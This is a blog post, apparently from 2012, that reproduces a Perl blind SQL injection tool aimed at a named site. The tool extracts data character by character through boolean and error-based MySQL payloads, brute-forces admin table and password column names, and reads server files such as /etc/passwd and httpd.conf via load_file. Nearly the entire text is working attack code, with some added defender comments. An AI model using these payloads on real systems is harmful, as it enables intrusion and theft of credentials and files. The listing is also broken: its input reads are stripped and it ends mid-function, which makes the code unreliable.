Jun 5, 2012

Perl script for SQL Injection By c4rp3nt3r@0x50sec.org

    #!/usr/bin/perl
    # blind sqlinjector [GET Method]
    # for educational purpose only!
    # by c4rp3nt3r@0x50sec.org
    
    use POSIX;
    use LWP::UserAgent;
    
    # Tool configuration. The script has no `use strict`/`use warnings`, so every
    # setting below is a package global that the subs read and write directly.
    ######################### configuration: begin #################################
    
    $target ="http://www.0x50sec.org/index.php?p=1'";               # injection URL; for a string-context injection append ' here and set the closing comment string below !!!
    $turestr='c4rp3nt3r.jpg';       #!!! substring expected in the response of a "true" page; must be changed per target
    
    ###################### the two settings above are mandatory ###########################
    
    $nullstr="%09";         # %20 + /**/ %09 %0a %0d   (whitespace substitute placed between SQL keywords)
    $comstr="";                     # closing string: # -- /* ; $nullstr."aNd".$nullstr."'1'='1";
    
    $tb_prefix='';          # table-name prefix
    
    #fuzz-path configuration options (consumed by fuzz_webpath)
    #
    $somexfile='index.php';
    $domain='0x50sec.org';
    $homeusr='c4rp3nt3r';
    
    ########################## configuration: end #################################
    
    # Table-name wordlist consumed by fuzz_tb and fuzz_tb_err_exp (one request per entry).
    @tables=(
    'admin',
    'information_schema.tables',
    'zipcode',
    'joyboard_admin',
    'tbl_manager',
    'SuperUser',
    'admins',
    'n_news',
    'enterprise_file_room',
    'BOARD_TB',
    'ADMIN_TB',
    'campuslogin',
    'users',
    'user',
    'usr_pw',
    'salt',
    'members',
    'rg_member',
    'mysql.user',
    'hash',
    'login',
    'log_user',
    'admin_user',
    'adminuser',
    'admin_info',
    'member_admin',
    'AdminUsers',
    'administrables',
    'administrateur',
    'administrateurs',
    'login_admin',
    'login_admins',
    'login_user',
    'login_users',
    'lost_pass',
    'lost_passwords',
    'lostpass',
    'lostpasswords',
    'stnuser',
    'stuser',
    'stusers',
    'stuseres',
    'staff',
    'u_name',
    'u_p',
    'u_pass',
    'Benutzer',
    'usercontrol',
    'user_pw',
    'Benutzerliste',
    'userlogins',
    'userpasswd',
    'admuser',
    'system',
    'adm',
    'tb_user',
    'x_admin',
    'm_admin',
    'manage',
    'member',
    'tbl_user',
    'tbl_data',
    'tbl_users',
    'tbl_admin',
    'tbl_admins',
    'tbl_member',
    'tbl_members',
    'tbladmins',
    'tb_club_admin',
    'tb_club_member',
    'tb_club_board_admin',
    'admin_user',
    'admin_userinfo',
    'administrator',
    'adminid',
    'admin_id',
    'adminuserid',
    'admin_userid',
    'AdminUID',
    'adminusername',
    'admin_username',
    'adminname',
    'admin_name',
    'wp_users',
    );
    
    #$sql='select table_name from information_schema.tables where TABLE_SCHEMA=0x6368656d limit 0,1';
    #$final="shit%\' and OrDMiD(($sql),1,1))>";
    #$final = $final.$num." #";
    
    # Shared mutable state. $result / $result_num accumulate findings as text, the
    # @ok_* arrays collect hits, and $long is reused everywhere as a scratch
    # "current array length" (an array assigned to a scalar yields its element count).
    $x_fuzzsql='';
    
    $subset=1;
    $subset=$ARGV[1];       # overwrites the 1 just above; dump_fuzz_half resets $subset again in its own for-loop
    $num=50;
    $result="";
    $result_num="";
    $oknum=0;
    
    $long=0;
    $oktbnum='1';
    @oktb=();               # character codes recovered by dump_fuzz_half, never cleared between runs
    $long=@oktb;
    
    @ok_tbname=();
    $long=@ok_tbname;
    
    @ok_usr_clm=();
    $long=@ok_usr_clm;
    @ok_pwd_clm=();
    $long=@ok_pwd_clm;
    
    @ok_path=();
    $long=@ok_path;
    
    @ok_clmname=();
    $long=@ok_clmname;
    
    # NOTE(review): $proxy is tested with defined() in several subs but is never
    # assigned anywhere in this listing, so the proxy branches are dead as written.
    #---------------------------------------------------------
    print "\n";
    print "\t|=-----------------------------------------=|\n";
    print "\t|=------[ Blind SQL Injector V1.3 ]--------=|\n";
    print "\t|=-------[ c4rp3nt3r\@0x50sec.org ]---------=|\n";
    print "\t|=-----------------------------------------=|\n\n";
    
    # Interactive menu; blocks on standard input and dispatches to the subs below.
    dump_fuzz_half_alpha();
    
    #fuzz_tb();
    #fuzz_pwd_usr_clm();
    
    print "-------------------------------\n\n";
    
    # $x_fuzzsql is the last expression probed by fuzz_half; @oktb holds the
    # character codes it recovered, printed here as text.
    print "[+]$x_fuzzsql:\n";
    #print("@oktb\n");
    foreach $oktbnum(@oktb)
    {
            printf("%c",$oktbnum);
    }
    print "\n";
    
    #print "[+]$sql:\n$result_num\n";
    #print("@oktb\n");
    #-------------------------------------------------------------
    
    # Summary of everything the fuzzers recorded in the @ok_* arrays.
    foreach $x_ok_tbname(@ok_tbname)
    {
            print " ".$x_ok_tbname."\n";
    }
    foreach $x_ok_clm(@ok_clmname)
    {
            print " ".$x_ok_clm."\n";
    }
    foreach $x_ok_path(@ok_path)
    {
            print " ".$x_ok_path."\n";
    }
    print "\n";
    print "[+] Enjoy Hacking...\n\n\007";
    print "-------------------------------\n\n";
    
    #################################
    
    # Interactive menu. Prints the option list, reads one key from standard
    # input and dispatches: digits 1-6, a-c and 0 go through dump_fuzz_half
    # (boolean-based, one character at a time), d-g and x go through err_exp
    # (error-based, 62-character chunks), 7/8/h/i/9 call the wordlist fuzzers.
    # Table names and file paths typed by the user are turned into MySQL 0x..
    # hex literals via hexencode so the payload carries no quote characters.
    # No arguments, no return value; all state is in package globals.
    sub dump_fuzz_half_alpha
    {
    
    print 'Choose a number to be execute:
            [0] sql (from [STDIN])
            [1] version()
            [2] database()
            [3] user()
            [4] dump table_schema v5.x
            [5] dump table_name (table_schem=database() v5.x)
            [6] dump column_name (table_name= [STDIN] v5.x)
            [7] fuzz table_name v4.x
            [8] fuzz column_name v4.x
            [9] fuzz web path(\'read httpd.conf\')
            [a] load_file(\'/etc/passwd\')
            [b] load_file(\'c:\\boot.ini\')
            [c] load_file(\'file path from [STDIN]\')
            [d] load_file(\'file path from [STDIN] error base\')
            [e] dump table_schema (v5.x error base)
            [f] dump table_name (table_schem=database() v5.x error base)
            [g] dump column_name (table_name= [STDIN] v5.x error base)
            [h] fuzz table_name (v4.x error base)
            [i] fuzz column_name (v4.x error base)
            [x] sql (from [STDIN] error base)
            ';
            print "\n";
            print "Choose a number#";
            # NOTE(review): the right-hand side of every "$var= ;" line in this listing
            # is empty; a read from standard input appears to have been stripped during
            # HTML extraction, so the code as shown would not compile.
            $xnum= ; chomp $xnum;
            if($xnum eq '0')
            {
                    print "Enter the sql#";
                    $sql_stdin= ; chomp $sql_stdin;
                    dump_fuzz_half($sql_stdin);
            }elsif($xnum eq '1')
            {
                    $sql_x='version()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '2')
            {
                    $sql_x='database()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '3')
            {
                    $sql_x='user()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '4')
            {
                    # Keywords are joined with $nullstr (default %09) instead of spaces.
                    $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '5')
            {
                    $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '6')
            {
                    print "Enter The table_name#";
                    $sql_stdin= ; chomp $sql_stdin;
                    # 0x-prefixed hex literal: compares equal to the string without needing quotes.
                    $sql_stdin="0x".hexencode($sql_stdin);
                    $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '7')
            {
                    fuzz_tb();
            }elsif($xnum eq '8')
            {
                    print "Enter The table name to fuzz the column#";
                    $sql_stdin= ; chomp $sql_stdin;
                    fuzz_pwd_usr_clm($sql_stdin);
            }elsif($xnum eq '9')
            {
                    fuzz_webpath();
            }
            elsif($xnum eq 'a')
            {
                    # load_file() requires the FILE privilege on the DB account; servers that
                    # set secure_file_priv or run the app under a least-privilege account return NULL here.
                    $file_path="load_file(0x".hexencode('/etc/passwd').")";
                    dump_fuzz_half($file_path);
            }elsif($xnum eq 'b')
            {
                    $file_path="load_file(0x".hexencode('c:\\boot.ini').")";
                    $sql_x="load_file($file_path)";
                    dump_fuzz_half($sql_x);
    
            }
            elsif($xnum eq 'c')
            {
                    print "Enter The file path to load_file#";
                    $sql_stdin= ; chomp $sql_stdin;
                    $file_path="0x".hexencode($sql_stdin);
                    $sql_x="load_file($file_path)";
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq 'd')
            {
                    print "Enter The file path to load_file#";
                    $sql_stdin= ; chomp $sql_stdin;
                    #$sql_stdin='/usr/local/apache2/htdocs/admin/admin.php';
                    $file_path="0x".hexencode($sql_stdin);
                    $sql_x="load_file($file_path)";
                    err_exp($sql_x);
            }elsif($xnum eq 'e')
            {
                    $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
                    err_exp($sql_x);
    
            }elsif($xnum eq 'f')
            {
    
                    $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
                    err_exp($sql_x);
            }elsif($xnum eq 'g')
            {
                    print "Enter The table_name#";
                    $sql_stdin= ; chomp $sql_stdin;
                    $sql_stdin="0x".hexencode($sql_stdin);
                    $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
                    err_exp($sql_x);
            }elsif($xnum eq 'h')
            {
                    fuzz_tb_err_exp();
            }elsif($xnum eq 'i')
            {
                    print "Enter The table name to fuzz the column#";
                    $sql_stdin= ; chomp $sql_stdin;
                    fuzz_pwd_usr_clm_err($sql_stdin);
            }elsif($xnum eq 'x')
            {
                    print "Enter the sql#";
                    $sql_stdin= ; chomp $sql_stdin;
                    err_exp($sql_stdin);
            }
            # Any other key falls through silently and the script continues to its summary.
    
    }
    #################
    sub hexencode{ #Sub to hex encode
    @subvar= @_;
    my $sqlstr = $subvar[0];
    my $encoded_command="";
    my @ASCII = unpack("C*", $sqlstr);
    foreach $line (@ASCII) {
    
    my $encoded = sprintf('%lx',$line);
    $encoded_command .= $encoded;
    }
    return $encoded_command;
    }
    
    #################
    # Boolean-based probe for readable files: for each candidate path it appends
    # `aND length(load_file(0x<hex path>))>0` to $target and treats the presence of
    # $turestr in the response as "file exists and is readable". Hits are appended
    # to @ok_path and to $result. No arguments, no return value.
    # Defender notes: every request carries `load_file(` and `length(` in the query
    # string with a 0x hex literal, which is a stable signature for WAF/log rules;
    # the probe only succeeds when the DB account holds the FILE privilege and
    # secure_file_priv permits the path, so least-privilege DB accounts neutralise it.
    sub fuzz_webpath
    {
    
    @ok_path=();
    $long=@ok_path;
    
    print "[*] Fuzzing path ...\n\n";
    # Absolute candidate files (global array, reassigned on every call).
    @paths=(
    '/usr/local/apache/conf/httpd.conf',
    '/usr/local/apache2/conf/httpd.conf',
    '/usr/local/apache2/conf/extra/httpd-ssl.conf', #apache2.2
    '/usr/local/etc/apache/httpd.conf',
    '/etc/apache2/apache2.conf',                            #ubuntu 2.0
    '/etc/httpd/conf/httpd.conf',
    '/var/log/apache2/error_log',
    '/var/log/apache/access_log',
    '/var/apache2/logs/error_log',
    '/var/log/httpd/error_log',
    '/etc/passwd',
    '/etc/issue',
    '/proc/version',
    '/proc/self/environ',
    );
    
    # Candidate document roots; $homeusr and $domain come from the config block.
    @wwwpaths=(
    '/var/www/',
    '/data/html/',
    '/www/htdocs/',
    '/home/webadm/',
    '/home/webadm/public_html/',
    '/usr/local/webroot/',
    '/var/apache2/htdocs/',
    '/var/www/htdocs/',
    '/var/www/html/',
    '/opt/lampp/htdocs/',
    '/var/www/localhost/htdocs/',
    '/usr/local/apache/htdocs/',
    '/usr/local/apache2/htdocs/',
    '/usr/local/www/apache22/data/',
    '/usr/local/www/data/',
    '/export/home/webhost/apache/apache1/htdocs/',
    '/web/',
    '/data/',
    '/www/',
    "/home/$homeusr/html/",
    "/home/$homeusr/docs/",
    "/home/$homeusr/public_html/",
    "/home/$homeusr/www/",
    "/home/$domain/www/",
    "/home/$domain/public_html/",
    "/www/htdocs/$domain/",
    "/home/$homeusr/$domain/",
    "/usr/local/webroot/$domain/",
    "/home/$homeusr/",
    "/www/users/$domain/",
    "/home/hosting_users/$homeusr/",
    "/data/webroot/$domain/",
    "/export/$homeusr/public_html/",
    "/home/www/websites/",
    "/home/www/websites/$homeusr/",
    "/var/www/html/$homeusr",
    );
    
            foreach $path(@paths)
            {
                    my $xfile="0x".hexencode($path);
                    $final=$target.$nullstr.'aND'.$nullstr.'length(load_file('.$xfile.'))>0'.$comstr;
                    # A fresh user agent per request (indirect-object `new` syntax; no agent string set here).
                    $ua =  new LWP::UserAgent or die;
                    $ua->timeout(35);
                    $ua->proxy("http", "http://$proxy/") if defined($proxy);
                    $tbres = $ua->get($final);
                    print $final."\n";
                    print "[*] Fuzzing web path  [$path]"."\n";
                    # $turestr is interpolated as a regex, not matched literally.
                    if($tbres->content =~ /$turestr/)
                    {
                    $result=$result."[+] Found ->".$path."\n\n";
                    print " \n[+] Found web path-> [$path]"."\n\n";
                    $long=@ok_path;
                    @ok_path[$long]=$path;  # append to the hit list (single-element slice syntax; $ok_path[$long] would be the usual form)
                    }
            }
            foreach $wpath(@wwwpaths)
            {
                    # NOTE: uses a literal 'index.php' rather than the configured $somexfile.
                    $some='index.php';
                    # The loop variable aliases the array element, so this also rewrites @wwwpaths in place.
                    $wpath=$wpath.$some;
                    my $xxfile="0x".hexencode($wpath);
                    $final=$target.$nullstr.'aND'.$nullstr.'LEnGth(lOad_FiLe('.$xxfile.'))>0'.$comstr;
                    $ua2 =  new LWP::UserAgent or die;
                    $ua2->timeout(35);
                    $ua2->proxy("http", "http://$proxy/") if defined($proxy);
                    $tbres = $ua2->get($final);
                    print "[*] Fuzzing web path [$wpath]"."\n";
                    print $final."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found ->".$wpath."\n\n";
                            print " \n[+] Found web path-> [$wpath]"."\n\n";
                            $long=@ok_path;
                            @ok_path[$long]=$wpath; # append to the hit list
                    }
            }
    }
    
    # Error-based table-name check. For each entry of @tables it wraps
    # `SeLEcT CoUNt(*) fRoM <prefix><table>` in the floor(rand(0)*2)/group-by
    # duplicate-key construct and looks for "Duplicate entry '1...' for key" in
    # the HTTP response; a match means the inner query ran, i.e. the table
    # exists. Hits go to @ok_tbname. No arguments, no return value.
    # Defender notes: this technique only works when raw MySQL error text is
    # echoed to the client; suppressing DB error output in production removes the
    # channel entirely, and the `floor(rand(0)*2)` + `group+by` pair is an easy signature.
    sub fuzz_tb_err_exp
    {
    $xsql = 'SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--
    
    #if($version==4): this is simply a table-name brute-forcer
    #print "$sql\n\007\n";
    @ok_tbname=();
    $long=@ok_tbname;
    
    print "[*]Fuzz table name...\n\n";
    
            foreach $tbname(@tables)
            {
    
                    print "[*]Fuzz table name [$tbname]"."\n";
                    $sqlexp = $xsql.$nullstr.$tb_prefix.$tbname;
                    $ua =  new LWP::UserAgent or die;
                    $ua->timeout(35);
                    $ua->proxy("http", "http://$proxy/") if defined($proxy);
    
                    # Literal '+' characters are used as spaces here, unlike the $nullstr-joined subs.
                    $payload = "aNd+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$payload.$comstr;
                    print $final."\n";
                    $res=$ua->get($final);
                    #print $res->content;
                    # Greedy [\s\S]* runs to the last "' for key " in the body.
                    if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
                    {
                        # $& is the whole match, so the two substitutions strip the fixed prefix/suffix.
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//;
                        $content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                            print "[+] got data finished!\n";
                            next;
                        }else
                            {
    
                                    print " \n[+] Found table_name-> [$tbname]"."\n\n";
                                    $long=@ok_tbname;
                                    @ok_tbname[$long]=$tbname;      # append to the hit list
                            # Note: overwrites $result rather than appending, unlike fuzz_tb.
                            $result = $content;
                            print "[+] content : \n$result\n\n";
                            }
                    }else
                    {
                            print "[-]$tbname doesn't exist!\n";
                            next;
                    }
    
            }
    
    }
    
    # Boolean-based table-name check. For each entry of @tables it appends
    # `aND(SeLEcT CoUNt(*) fRoM <prefix><table>)` to $target; if the response
    # still contains $turestr the subquery evaluated without error, so the
    # table is recorded in @ok_tbname and $result. No arguments, no return value.
    # The mixed-case keywords (aND / SeLEcT / CoUNt) are a filter-evasion habit
    # and, being fixed strings, a reliable detection signature.
    sub fuzz_tb
    {
    $xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--
    
    #if($version==4): this is simply a table-name brute-forcer
    #print "$sql\n\007\n";
    @ok_tbname=();
    $long=@ok_tbname;
    
    print "[*]Fuzz table name...\n\n";
    
            foreach $tbname(@tables)
            {
                    $final=$target.$xsql.$nullstr.$tb_prefix.$tbname.')'.$comstr;
                    $ua =  new LWP::UserAgent or die;
                    $ua->timeout(35);
                    $ua->proxy("http", "http://$proxy/") if defined($proxy);
                    $tbres = $ua->get($final);
                    print "[*]Fuzz table name [$tbname]"."\n";
                    print $final."\n";
                    # $turestr is interpolated as a regex pattern.
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found ->".$tbname."\n\n";
                            print " \n[+] Found table_name-> [$tbname]"."\n\n";
                            $long=@ok_tbname;
                            @ok_tbname[$long]=$tbname;      # append to the hit list
                    }
            }
    
    }
    ###################
    # Error-based column-name check for one table. Takes the table name
    # ($xok_tbname) and, for each candidate in @usrclms then @pwdclms, sends
    # `SeLEcT CoUNt(<column>) fRoM <table>` inside the duplicate-key error
    # construct; a "Duplicate entry '1...' for key" response marks the column as
    # present. Every hit is pushed onto @ok_clmname; $usr and $pwd end up holding
    # the LAST matching user- and password-column name, which are then combined
    # into $fuzzsql (only printed here). No return value.
    # Defender note: the payload shape is identical to err_exp / fuzz_tb_err_exp
    # and is defeated by not echoing database errors to the client.
    sub fuzz_pwd_usr_clm_err
    {
    my($xok_tbname)=@_;
    ##-------
    
    # Candidate user-name columns (global, reassigned on each call).
    @usrclms=(
    'id',
    'idx',
    'admin',
    'adminname',
    'admin_id',
    'user_name',
    'user',
    'username',
    'login',
    'email',
    'user_id',
    'no',
    'uid',
    'cnumber',
    'zipcode',
    'job',
    'mail',
    'usr',
    'name',
    'u_name',
    'login_id',
    'administrators',
    'administrator',
    'adminuser',
    'adminname',
    'admin_name',
    'admin_user',
    'admin_username',
    'user_admin',
    'user_n',
    'AD_id',
    'user_un',
    'user_uname',
    'user_username',
    'user_usernm',
    'user_usernun',
    'user_usrnm',
    'usr',
    'usr_n',
    'usr_name',
    'usr_pass',
    'usr2',
    'usrn',
    'userid',
    'usrnam',
    'usrname',
    'usrnm',
    'adminusername',
    'bbsuser',
    'bbsid',
    'bbsusername',
    'permission',
    'access',
    'accnt',
    'accnts',
    'account',
    'accounts',
    '帐号',
    '管理员',
    '权限',
    '用户名',
    '会员',
    '用户帐号',
    );
    # Candidate password columns.
    @pwdclms=(
    'password',
    'userpass',
    'pass',
    'pwd',
    'psw',
    'userpwd',
    'userpw',
    'psd',
    'pw',
    'user_pass',
    'admin_password',
    'PassWD',
    'user_password',
    'uPassword',
    'user_pwd',
    'adminpwd',
    'admin_pass',
    'admin_pwd',
    'admin_password',
    'login_pass',
    'login_passwd',
    'login_password',
    'login_pw',
    'AD_pass',
    'login_pwd',
    'login_user',
    'login_username',
    'adminpsw',
    'adminupass',
    'user_pass',
    'user_passw',
    'user_passwd',
    'user_pw',
    'user_pwd',
    'user_pword',
    'pword',
    'user_pwrd',
    '密码',
    '用户密码',
    '编号',
    );
    
            # One user agent is reused for all requests in this sub.
            $ua =  new LWP::UserAgent or die;
            $ua->timeout(35);
            $ua->proxy("http", "http://$proxy/") if defined($proxy);
    
            print "\n[*]Fuzz user column name...\n\n";
            foreach $usr_clm(@usrclms)
            {
    
                    $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
                    $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$payload.$comstr;
                    print $final."\n";
                    $res=$ua->get($final);
                    #print $res->content;
                    if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
                    {
                        # $& is the full match; strip the fixed prefix and suffix to leave the echoed value.
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//;
                        $content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                            print "[+] got data finished!\n";
                            next;
                        }else
                            {
                                    $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
                                    print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                                    $usr=$usr_clm;
                                    $long=@ok_clmname;
                                    $ok_clmname[$long]=$usr_clm;
                            # The appended $result text above is immediately replaced here.
                            $result = $content;
                            print "[+] content : \n$usr_clm\n\n";
                            }
                    }else
                    {
                            print "[-]$usr_clm doesn't exist!\n";
                            next;
                    }
    
            }
    
            print "\n[*]Fuzz password column name...\n\n";
            foreach $pwd_clm(@pwdclms)
            {
                    $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
                    $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$payload.$comstr;
                    print $final."\n";
                    $res=$ua->get($final);
                    #print $res->content;
                    if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
                    {
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//;
                        $content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                            print "[+] got data finished!\n";
                            next;
                        }else
                            {
                                    $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
                                    print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                                    $pwd=$pwd_clm;
                                    $long=@ok_clmname;
                                    $ok_clmname[$long]=$pwd_clm;
                            $result = $content;
                            print "[+] content : \n$pwd_clm\n\n";
                            }
                    }else
                    {
                            print "[-]$pwd_clm doesn't exist!\n";
                            next;
                    }
            }
            # $usr / $pwd are globals; if no column matched they keep whatever an earlier call left (or are empty).
            $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
            print "[+]".$fuzzsql."\n";
            #dump_fuzz_half($fuzzsql);
    
    }
    ##################################
    # Boolean-based column-name check for one table ($xok_tbname). Each
    # candidate in @usrclms and @pwdclms is tested with
    # `aND(SeLEcT CoUNt(<column>) fRoM <table>)`; a response still containing
    # $turestr marks the column as present. Hits go to @ok_clmname; $usr and
    # $pwd retain the LAST match of each list and are combined into $fuzzsql,
    # which is only printed. No return value.
    sub fuzz_pwd_usr_clm
    {
    my($xok_tbname)=@_;
    ##-------
    
    # Candidate user-name columns (global, reassigned on each call).
    @usrclms=(
    'id',
    'idx',
    'admin',
    'adminname',
    'admin_id',
    'user_name',
    'user',
    'username',
    'login',
    'email',
    'mail',
    'AD_id',
    'usr',
    'name',
    'u_name',
    'login_id',
    'administrators',
    'administrator',
    'adminuser',
    'adminname',
    'admin_name',
    'admin_user',
    'admin_username',
    'user_admin',
    'user_n',
    'user_un',
    'user_uname',
    'user_username',
    'user_usernm',
    'user_usernun',
    'user_usrnm',
    'usr',
    'usr_n',
    'usr_name',
    'usr_pass',
    'usr2',
    'usrn',
    'userid',
    'usrnam',
    'usrname',
    'usrnm',
    'adminusername',
    'bbsuser',
    'bbsid',
    'bbsusername',
    'permission',
    'access',
    'accnt',
    'accnts',
    'account',
    'accounts',
    '帐号',
    '管理员',
    '权限',
    '用户名',
    '会员',
    '用户帐号',
    );
    # Candidate password columns.
    @pwdclms=(
    'password',
    'userpass',
    'pass',
    'pwd',
    'psw',
    'userpwd',
    'userpw',
    'psd',
    'pw',
    'user_pass',
    'admin_password',
    'PassWD',
    'user_password',
    'uPassword',
    'user_pwd',
    'adminpwd',
    'admin_pass',
    'admin_password',
    'login_pass',
    'login_passwd',
    'login_password',
    'login_pw',
    'login_pwd',
    'login_user',
    'login_username',
    'adminpsw',
    'AD_pass',
    'admin_pwd',
    'adminupass',
    'user_pass',
    'user_passw',
    'user_passwd',
    'user_pw',
    'user_pwd',
    'user_pword',
    'pword',
    'user_pwrd',
    '密码',
    '用户密码',
    '编号',
    );
    
            # One user agent reused for every request in this sub.
            $ua =  new LWP::UserAgent or die;
            $ua->timeout(35);
            $ua->proxy("http", "http://$proxy/") if defined($proxy);
    
            print "\n[*]Fuzz user column name...\n\n";
            foreach $usr_clm(@usrclms)
            {
                    $xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
                    $final=$target.$xsql;
                    $tbres = $ua->get($final);
                    print "[*]Fuzz $usr_clm from $xok_tbname ...\n";
                    print $final."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
                            print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                            $usr=$usr_clm;
                            $long=@ok_clmname;
                            $ok_clmname[$long]=$usr_clm;
                            #last;
                    }
            }
    
            print "\n[*]Fuzz password column name...\n\n";
            foreach $pwd_clm(@pwdclms)
            {
                    # Dead assignment: $xsql is overwritten by the statement immediately below.
                    $xsql = $nullstr."union".$nullstr."select".$nullstr;
            $xsql =
            $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
    
                    $final=$target.$xsql;
                    $tbres = $ua->get($final);
                    print "[*]Fuzz [$pwd_clm] from [$xok_tbname] ...\n";
                    print $final."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
                            print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                            $pwd=$pwd_clm;
                            $long=@ok_clmname;
                            $ok_clmname[$long]=$pwd_clm;
                            #last;
                    }
            }
            # $usr / $pwd are globals; with no match they keep a previous call's value (or stay empty).
            $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
            print "[+]".$fuzzsql."\n";
            #dump_fuzz_half($fuzzsql);
    
    }
    
    #################################
    # Recovers the result of the SQL expression $fuzzsql one character at a
    # time: for positions 1..799 it asks fuzz_half for the ASCII code of that
    # character (binary search over 0..127) and appends it to the global @oktb.
    # A code of 0 means "past the end of the string": a newline (10) is appended
    # and the loop stops. After every character the partial text is reprinted.
    # No return value; @oktb, $result, $result_num and $subset are globals, and
    # @oktb is never cleared here, so successive calls accumulate.
    # Defender note: each character costs about seven near-identical requests
    # that differ only in the position and threshold, a rate/pattern anomaly
    # that is easy to alert on in access logs.
    sub dump_fuzz_half
    {
            my($fuzzsql) = @_;
            #$fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
            $fucked='';
            for($subset=1;$subset<800;$subset++)
            {
                    $oknum=fuzz_half($fuzzsql,$subset,0,127);
                    if($oknum==0)
                    {
                            $long=@oktb;
                            @oktb[$long]=10;        # terminate the recovered text with a newline
                            last;
                    }
                    $result.=$subset.":".$oknum."\n";
                    $result_num.=$oknum." ";
                    $long=@oktb;
                    @oktb[$long]=$oknum;
                    #print "$result";
                    #print "$result_num\n";
                    print "[+]$fuzzsql:\n";
    
                    foreach $xoktbnum(@oktb)
                    {
                            printf("%c",$xoktbnum);
                    }
                    print "\n\n";
            }
            print "\n\n\n";
    
    }
    
    ##################################
    # Binary search for the ASCII code of character $subset of the result of $sql.
    # Invariant: the code is > $min and <= $max. Each step sends
    # `AnD ascii(mid((<sql>),<subset>,1))><mid>` to $target; if the response
    # contains $turestr the comparison held and $min moves up, otherwise $max
    # moves down. Returns $max once the interval has width one, or 0 when the
    # interval is (0,1] (character code 0, i.e. past the end of the string).
    # The recursive calls are the last expression evaluated in each branch, so
    # their value is returned implicitly. Also sets the global $x_fuzzsql.
    sub fuzz_half   # recursive binary-search probe (written originally for order by counting)
    {
       # ($min,$max) is the search interval; the value we want lies inside it and we halve the interval until it is found
       # $min: the confirmed integer for which the page still renders the "true" marker
       # $max: the smallest confirmed integer for which the page does not; it bounds the interval, hence "max"
       my ($sql,$subset,$min, $max) = @_;
       $x_fuzzsql=$sql;
       if($max==1&&$min==0)
       {
                    return 0;
       }
       if($max-$min==1)# when the interval has width one the answer is fixed: the code is > $min
        {                           # and not > $max, so it equals $max; stop recursing and return it
            return $max;
       }
       # otherwise probe the midpoint of the interval
       my $mid=int(($min+$max)/2);# integer mean of the two bounds
       #print "max:$max,min:$min,mid=$mid\n";
            # %2C is a URL-encoded comma; $nullstr (default %09) stands in for spaces.
            $final=$nullstr."AnD".$nullstr."ascii(mid(($sql)%2C".$nullstr."$subset%2C".$nullstr."1))>";
            $final = $target.$final.$mid.$comstr;
    
            print "[*] Test ascii(MiD(($sql)%2C$subset%2C1))>$mid...\n";
            print $final."\n";
       #print $final."\n";
            # Fixed browser User-Agent string; together with the %2C/%09 payload shape it is a stable log signature.
